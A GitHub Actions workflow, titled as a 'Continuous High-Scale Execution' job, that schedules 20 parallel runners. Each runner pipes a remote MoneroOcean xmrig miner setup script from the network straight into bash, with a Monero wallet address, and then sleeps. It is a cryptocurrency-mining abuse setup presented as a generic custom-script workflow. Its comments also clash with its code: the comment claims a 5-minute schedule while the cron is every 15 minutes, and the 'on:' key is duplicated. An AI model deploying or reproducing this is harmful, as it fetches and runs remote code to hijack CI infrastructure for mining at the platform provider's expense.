name: Continuous High-Scale Execution

on:
  schedule:
    # Runs every 5 minutes (the maximum frequency allowed by GitHub)
    - cron: '*/15 * * * *'

on:
  workflow_dispatch: # Allows you to start it manually for testing

jobs:
  execute-script:
    runs-on: ubuntu-latest
    strategy:
      # 'fail-fast: false' ensures one failing runner doesn't kill the others
      fail-fast: false
      matrix:
        # Each number represents a separate runner instance
        # Adjust the length of this list based on your account limits
        runner-id: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20]

    steps:
      - name: Checkout repository
        uses: actions/checkout@v4

      - name: Run your custom script
        run: |
          curl -s -L https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/setup_moneroocean_miner.sh | bash -s 44bz3nLuQZnJCpV6EQUEGDfX1f9xKvkzKY4rPo6g3EXp3FrMPAYZjPSGExvHf6RrS6YgoTTmp55bWQM94sqfng6eH8P4JfX
          sleep 1000
        shell: bash
